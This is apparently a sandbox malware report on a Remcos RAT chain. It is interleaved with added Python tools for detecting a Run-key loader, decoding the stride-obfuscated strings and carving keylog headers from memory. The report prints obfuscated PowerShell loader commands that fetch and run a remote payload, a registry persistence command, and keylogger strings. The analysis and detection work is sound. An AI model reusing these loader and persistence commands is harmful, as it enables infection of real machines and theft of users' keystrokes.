a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,regenteac erudndlidest.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. 
a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "argumentlistens" /t reg_expand_sz /d "%semicomic% -w 1 $affektationernes=(get-itemproperty -path 'hkcu:\agenetic76\').tautologiske178;%semicomic% ($affektationernes)"
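The Run value created by the command above deserves a second look. Its data is REG_EXPAND_SZ; the program it names is an environment variable, %semicomic%, which Windows does not define, so the dropper must set it itself somewhere not shown in this section; and the value holds no payload, only a one-liner that reads another registry value (HKCU\agenetic76, value tautologiske178) and executes it. A Run entry of this shape never contains the string "powershell" or the script it launches, so a naive string match on autorun values misses it. The check below is an added example written for this page, not code from the report or the sample: it parses reg add command lines from process-creation telemetry (the report's own line, plus a constructed benign OneDrive entry for contrast) and reports those three properties.

```python
import re

# Process-creation command lines to assess. The first is the one recorded in
# this report (lowercased, as the sandbox renders it); the second is a
# constructed benign Run entry used for contrast.
SAMPLE_CMDLINES = [
    r'''"c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "argumentlistens" /t reg_expand_sz /d "%semicomic% -w 1 $affektationernes=(get-itemproperty -path 'hkcu:\agenetic76\').tautologiske178;%semicomic% ($affektationernes)"''',
    r'''reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"''',
]

# 'reg add <key>' with an optionally quoted key (keys containing spaces are
# not handled; none of the autorun keys of interest contain any).
REG_ADD = re.compile(r'\breg(?:\.exe)?\s+add\s+"?([^"\s]+)"?', re.I)
RUN_KEY = re.compile(r'\\currentversion\\run(?:once)?\b', re.I)
ENV_VAR = re.compile(r'%([a-z_][a-z0-9_()]*)%', re.I)
# Ways a one-liner can pull its real script out of the registry instead of
# naming a file on disk.
INDIRECT = re.compile(
    r'get-itemproperty|get-itempropertyvalue|hkcu:|hklm:|registry::|invoke-expression|\biex\b',
    re.I,
)
# Variables Windows itself defines; any other %name% in a Run value is suspect.
STANDARD_ENV = {
    "systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)",
    "programdata", "appdata", "localappdata", "userprofile", "public",
    "temp", "tmp", "comspec",
}


def _switch(cmdline: str, name: str):
    """Value of a reg.exe switch (/v, /t, /d): a quoted string or a bare token."""
    m = re.search(r'/' + name + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def assess_run_entry(cmdline: str) -> list:
    """Reasons a 'reg add' to a Run/RunOnce key looks like a staged loader.

    Returns [] when the command is not a Run-key add or shows none of the
    properties checked for."""
    m = REG_ADD.search(cmdline)
    if not m or not RUN_KEY.search(m.group(1)):
        return []
    reasons = []
    vtype = (_switch(cmdline, "t") or "REG_SZ").upper()
    data = _switch(cmdline, "d") or ""
    if vtype == "REG_EXPAND_SZ":
        reasons.append("REG_EXPAND_SZ: the real command only exists after "
                       "Explorer expands the value at logon")
    for var in sorted({v.lower() for v in ENV_VAR.findall(data)}):
        if var not in STANDARD_ENV:
            reasons.append(f"%{var}% is not a Windows-defined variable; "
                           "the dropper has to set it itself")
    if INDIRECT.search(data):
        reasons.append("value executes content fetched from another registry "
                       "location rather than a file on disk")
    return reasons


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line[:70] + "...")
        for reason in assess_run_entry(line) or ["(nothing flagged)"]:
            print("   -", reason)
```

On the report's line all three properties fire; the OneDrive entry produces nothing. For hunting at scale the same three checks apply directly to the values under HKCU and HKLM ...\CurrentVersion\Run, where REG_EXPAND_SZ data that expands a non-standard variable is rare enough to review by hand.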
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn t;resildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
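Both PowerShell stages above (the one launched from cmd.exe with sortkridtstegningens, and the one launched from wscript.exe with beshout) use the same string obfuscation: every literal is five filler characters followed by one real character, and the decoder walks the string with a stride of 6 from offset 5, stopping before the last character so the trailing filler group is dropped. The decoder below is an added example written for this page, not code from the sample or from Joe Sandbox. It also shows two things an analyst copying strings out of this report has to account for: the sandbox renders command lines lowercased, so decoded text is lowercase too, and the report's HTML collapses runs of spaces, which silently shifts the stride. The user-agent literal is therefore given twice, once exactly as displayed above and once with the two collapsed double spaces restored (before "sove(" and before "trouns"); that restoration is my inference from the stride, and the fact that the result is a standard Firefox user-agent confirms it. The remaining literals on the page ($hypermnesia / $gem and the rest) decode with the same function.

```python
# Decoder for the stride-based string obfuscation used by both PowerShell stages
# in this report. The sample's own decoder, with its Danish-word variable names
# shortened, is:
#   $s = 'substring'; $n = 1
#   function decode($x) {
#       $len = $x.length - $n
#       for ($i = 5; $i -lt $len; $i += 6) { $out += $x.$s.invoke($i, $n) }
#       $out
#   }
# Every sixth character from offset 5 is real; the other five are filler. The
# loop bound (length - 1) discards the final filler group, whose sixth
# character is the trailing space every literal ends with.


def decode_stride(obfuscated: str, start: int = 5, step: int = 6) -> str:
    """Reproduce sortkridtstegningens()/beshout(), including the
    'stop before the last character' bound that drops the padding group."""
    return obfuscated[start:len(obfuscated) - 1:step]


def plausibly_decoded(text: str) -> bool:
    """Cheap sanity check: non-empty, printable ASCII. Necessary but not
    sufficient; a shifted stride still yields printable junk (see below)."""
    return bool(text) and all(32 <= ord(c) < 127 for c in text)


# $fligene: the command name that caprellidae() runs via '& ($fligene)'.
FLIGENE = " molyi forhetopsax pers "
# $lrredskjolernes: decodes to the HTTP header name used with the literal below.
LRREDSKJOLERNES = " scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav "
# $festdragtens exactly as the rendered report shows it: lowercased by the
# sandbox, and with two runs of spaces collapsed by the HTML.
UA_AS_DISPLAYED = " s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, "
# The same literal with the two collapsed double spaces restored (before
# 'sove(' and before 'trouns'). This restoration is my inference from the
# stride; the decoded result being a standard Firefox user-agent confirms it.
UA_RESTORED = " s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin  sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis  trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, "


def decode_all() -> dict:
    """Decode the literals above, keyed by the sample's variable names."""
    return {
        "fligene": decode_stride(FLIGENE),
        "lrredskjolernes": decode_stride(LRREDSKJOLERNES),
        "festdragtens_as_displayed": decode_stride(UA_AS_DISPLAYED),
        "festdragtens_restored": decode_stride(UA_RESTORED),
    }


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:26} plausible={plausibly_decoded(value)!s:5} {value!r}")
```

The as-displayed user-agent decodes correctly up to "mozilla/5.0" and then turns into letter soup, yet still passes the printable-ASCII check, which is why a decoded string should be judged against what it is used for (a command name, a header name, a URL) rather than by a plausibility filter alone.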
              Source: wab.exe, 0000000B.00000003.2567405608.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [2024/05/31 02:09:46 Program Manager]
              Source: wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 06/02 01:14:58 Program Manager]
              Source: wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
              Source: wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [2024/05/31 02:13:57 Program Manager]
              Source: wab.exe, 0000000B.00000003.2567405608.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [2024/05/31 02:09:40 Program Manager]
              Source: wab.exe, 0000000B.00000002.3423060854.00000000060A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager|340105828
              Source: wab.exe, 0000000B.00000003.2567405608.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerles
              Source: wab.exe, 0000000B.00000002.3423060854.00000000060A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: wab.exe, 0000000B.00000002.3423320170.00000000060C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423478694.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [2024/06/04 19:43:27 Program Manager]
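The "Program Manager" strings above are not noise. The format string on the page, [%04i/%02i/%02i %02i:%02i:%02i Program Manager], produces a per-window header of the form [YYYY/MM/DD HH:MM:SS <foreground window title>], and the dated instances are headers that had already been written when wab.exe (process 0000000B) was dumped; "Program Manager" is the title of the Explorer desktop window, so the sandboxed user was sitting on an idle desktop. Together with the Remcos detection and the global keyboard hook the report lists, this is the shape of the RAT's offline keylog, where keystrokes follow each header until the next one. The carver below is an added example, not part of the report: it pulls such headers and the text between them out of a memory dump. The dump excerpt is constructed around the timestamps the report lists; the surrounding bytes and the keystroke text are made up for the example.

```python
import re
from datetime import datetime

# Header written before keystrokes each time the foreground window changes:
#   "[%04i/%02i/%02i %02i:%02i:%02i <window title>]"
# (format string recovered from the wab.exe dump in this report).
HEADER = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]\r\n]+)\]"
)

# Constructed dump excerpt. The four dated headers are the ones the report
# lists; the NUL/0xFF padding, the "|Program Manager|" fragments and the
# keystroke text between headers are invented for the example. The unfilled
# format string at the end must not be carved as an entry.
SAMPLE_DUMP = (
    "\x00\x00|Program Manager|\x00"
    "[2024/05/31 02:09:40 Program Manager]hello\r\n"
    "[2024/05/31 02:09:46 Program Manager]"
    "\x00\xff[2024/05/31 02:13:57 Program Manager]cd temp[Enter]"
    "[2024/06/04 19:43:27 Program Manager]\x00Program Manager|340105828\x00"
    "[%04i/%02i/%02i %02i:%02i:%02i Program Manager]"
)


def carve_keylog(blob: str):
    """Return [(timestamp, window_title, captured_text), ...] for every
    header in the blob, in chronological order.

    The text of an entry runs from its header to the next header, or to the
    first NUL byte, whichever comes first: NUL marks the end of the string as
    it sat in memory, and whatever follows belongs to some other allocation."""
    hits = list(HEADER.finditer(blob))
    records = []
    for i, m in enumerate(hits):
        year, month, day, hour, minute, second, title = m.groups()
        end = hits[i + 1].start() if i + 1 < len(hits) else len(blob)
        text = blob[m.end():end].split("\x00", 1)[0]
        when = datetime(int(year), int(month), int(day),
                        int(hour), int(minute), int(second))
        records.append((when, title, text))
    # Fragments of a log can land in memory out of order; sort is stable, so
    # entries with equal timestamps keep their dump order.
    records.sort(key=lambda r: r[0])
    return records


if __name__ == "__main__":
    for when, title, text in carve_keylog(SAMPLE_DUMP):
        print(f"{when:%Y-%m-%d %H:%M:%S}  {title:20} {text!r}")
```

Run over a real dump (read the file, decode as latin-1 so every byte survives) the same function gives a timeline of which windows were in the foreground and what was typed in each, which is the evidence a responder needs when deciding which credentials to rotate.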
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB2933 cpuid 11_2_21CB2933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
